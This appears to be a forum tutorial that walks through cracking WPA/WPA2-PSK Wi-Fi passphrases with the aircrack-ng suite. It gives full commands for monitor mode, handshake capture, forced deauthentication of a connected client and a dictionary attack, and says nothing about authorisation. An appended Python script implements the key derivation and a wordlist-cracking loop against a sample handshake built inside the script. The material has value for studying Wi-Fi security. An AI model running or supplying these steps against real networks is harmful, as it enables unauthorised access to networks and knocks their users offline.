What is the difference between cracking a WPA network and a WPA2 network? Nothing! From the attacker's side the dictionary attack on a WPA-PSK or WPA2-PSK (personal) network is the same: both use the same 4-way handshake, and the only difference is the algorithm used for the handshake MIC (HMAC-MD5 for WPA/TKIP, HMAC-SHA1 for WPA2/CCMP), which aircrack-ng handles for you. In order to successfully crack any WPA/WPA2-PSK network, two things must happen:
1) You must capture the full 4-way handshake between the AP and a client.
2) The passphrase must be in the dictionary you choose. This is a dictionary attack, not an exhaustive brute force: if the passphrase is not in the list, it will not be found.
We will be using the aircrack-ng suite of tools and a small dictionary file on Ubuntu.
There are a few ways to crack a WPA/WPA2-PSK password; this is just one of them.
This method works because of the end user, not because of a flaw in the protocol: most people pick a passphrase that is easy to remember, because nobody wants to type a long random password, and short memorable passphrases are exactly what dictionary files contain.
You will need the following details:
A client connected to the AP, which you will deauthenticate to force a new handshake
ESSID = the name of the wireless network, e.g. MYWIRELESS
BSSID = the MAC address of the AP, in the format 00:1C:10:26:A9:39. Everyone's is different, so make sure
you write it down correctly or the following will not work
Channel = the channel the AP is broadcasting on, e.g. channel 7
ALSO you will need a decent dictionary file. Many are available on the internet; Google is your friend on this one. Then let's start; the steps are below.
Step 1 - Start the wireless interface in monitor mode
airmon-ng start wifi0 (puts the interface into monitor mode; with the madwifi-ng driver used here this creates the ath0 monitor interface used in the following steps)
airodump-ng ath0 (lists the access points and clients in range; note the target's BSSID, channel and the MAC of a connected client)
Step 2 - Start airodump-ng to collect the authentication handshake
airodump-ng -c 11 -w psk --bssid 00:1C:10:26:A9:39 ath0
Where:
-c 11 is the channel of the wireless network
--bssid 00:1C:10:26:A9:39 is the access point MAC address. This eliminates extraneous traffic.
-w psk is the file name prefix for the capture files (psk-01.cap and so on) which will contain the handshake.
ath0 is the interface name.
Important: Do NOT use the "--ivs" option. You must capture full packets; an IVs-only capture does not contain the EAPOL frames that make up the handshake.
Step 3 - Use aireplay-ng to deauthenticate the wireless client
aireplay-ng -0 3 -a 00:1C:10:26:A9:39 -c 00:0F:B5:EC:99:6F ath0
Where:
-0 means deauthentication
3 is the number of deauths to send (you can send more if you wish)
-a 00:1C:10:26:A9:39 is the MAC address of the access point
-c 00:0F:B5:EC:99:6F is the MAC address of the client you are deauthing
ath0 is the interface name
Run this in a second terminal while airodump-ng from Step 2 keeps running. When the client reconnects, airodump-ng shows "WPA handshake: 00:1C:10:26:A9:39" in the top right corner; that is the confirmation that the handshake is in the capture file.
Step 4 - Run aircrack-ng to crack the pre-shared key
aircrack-ng -w dictionary.txt -b 00:1C:10:26:A9:39 psk*.cap
Where:
-w dictionary.txt is the name of the dictionary file. Remember to specify the full path if the file is not located in the current directory.
-b 00:1C:10:26:A9:39 selects the network to crack, in case the capture contains handshakes from more than one AP.
psk*.cap is the group of files containing the captured packets. Notice that we used the wildcard * to include multiple files.
Done. Now wait for some time: aircrack-ng tries every word in the file, so the time it takes depends on the size of your dictionary and on where the passphrase sits in it.
If the passphrase is in the list, aircrack-ng prints "KEY FOUND!" with the PSK passphrase. If it finishes with "Passphrase not in dictionary", the capture is fine but you need a better wordlist.
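To show what aircrack-ng actually does with the dictionary in Step 4, and why requirements 1) and 2) above are the only things that matter, here is an added example in Python that is not part of the original post and not aircrack-ng's own code. It implements the real WPA/WPA2-PSK derivation (PMK = PBKDF2-HMAC-SHA1 over the SSID, PTK via the 802.11i PRF-512, MIC over the EAPOL-Key frame) and runs a wordlist against a handshake. The handshake itself is constructed in the script (the BSSID and client MAC are the ones from the commands above, the nonces, EAPOL frame and wordlist are made up), since a real run would read these values out of psk-01.cap.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Constructed sample values (not from any real capture). The BSSID and client
# MAC are the ones used in the tutorial commands; the nonces are made up.
SSID = b"MYWIRELESS"
AP_MAC = bytes.fromhex("001c1026a939")
CLIENT_MAC = bytes.fromhex("000fb5ec996f")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))

# Constructed wordlist standing in for dictionary.txt
WORDLIST = ["password", "letmein1", "MYWIRELESS", "12345678", "wireless123", "qwerty123"]


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    This is the expensive step: almost all of aircrack-ng's time goes here."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf_512(pmk: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(PMK, label || 0x00 || data || i) for i = 0..3,
    concatenated and truncated to 64 bytes."""
    out = b"".join(
        hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def kck_from_pmk(pmk: bytes, ap: bytes, client: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Derive the PTK from the PMK, both MACs and both nonces; its first 16 bytes are
    the KCK, the key that authenticates the EAPOL-Key frames."""
    data = min(ap, client) + max(ap, client) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes, key_version: int) -> bytes:
    """MIC over the EAPOL-Key frame (MIC field zeroed). This is the only place WPA and
    WPA2 differ: descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP)
    uses HMAC-SHA1 truncated to 128 bits."""
    if key_version == 1:
        return hmac.new(kck, eapol_frame, hashlib.md5).digest()
    if key_version == 2:
        return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version %d" % key_version)


def build_eapol_msg2(key_version: int, snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with an empty key-data field and
    the 16-byte MIC field zeroed, i.e. exactly the bytes the MIC is computed over."""
    descriptor = bytes([0x02 if key_version == 2 else 0xFE])  # RSN vs legacy WPA descriptor
    key_info = (0x0108 | key_version).to_bytes(2, "big")       # pairwise + MIC bits + version
    body = (descriptor + key_info
            + (0).to_bytes(2, "big")           # key length
            + (1).to_bytes(8, "big")           # replay counter
            + snonce                           # 32-byte SNonce
            + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID
            + bytes(16)                        # MIC field, zeroed
            + (0).to_bytes(2, "big"))          # key data length
    # 802.1X header: protocol version 1, packet type 3 (EAPOL-Key), body length
    return bytes([0x01, 0x03]) + len(body).to_bytes(2, "big") + body


def make_sample_handshake(true_passphrase: str, key_version: int) -> dict:
    """Constructed stand-in for the handshake in psk-01.cap: returns what an attacker
    really has (MACs, nonces, zero-MIC EAPOL frame, captured MIC) for a network whose
    passphrase is true_passphrase."""
    eapol = build_eapol_msg2(key_version, SNONCE)
    kck = kck_from_pmk(pmk_from_passphrase(true_passphrase, SSID),
                       AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return {"ssid": SSID, "ap": AP_MAC, "client": CLIENT_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": eapol, "mic": eapol_mic(kck, eapol, key_version),
            "key_version": key_version}


def crack(hs: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack as aircrack-ng -w performs it: derive PMK -> KCK -> MIC for each
    candidate and compare with the captured MIC. Returns None when the passphrase is
    not in the list, which is requirement 2) above."""
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:  # WPA-PSK passphrases are 8..63 characters
            continue
        kck = kck_from_pmk(pmk_from_passphrase(candidate, hs["ssid"]),
                           hs["ap"], hs["client"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["key_version"]), hs["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    for version, name in ((2, "WPA2 (CCMP)"), (1, "WPA (TKIP)")):
        hs = make_sample_handshake("wireless123", version)
        print(name, "->", crack(hs, WORDLIST))
```

Both the WPA and the WPA2 handshake crack with the same loop; only eapol_mic changes, which is the whole content of the "no difference" claim at the top of the post. Notice also that the SSID goes into the PBKDF2 salt, so a rainbow table for one network name is useless against another, and that 4096 PBKDF2 rounds per candidate is what makes a bigger dictionary cost real time.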
&evilmonkey000&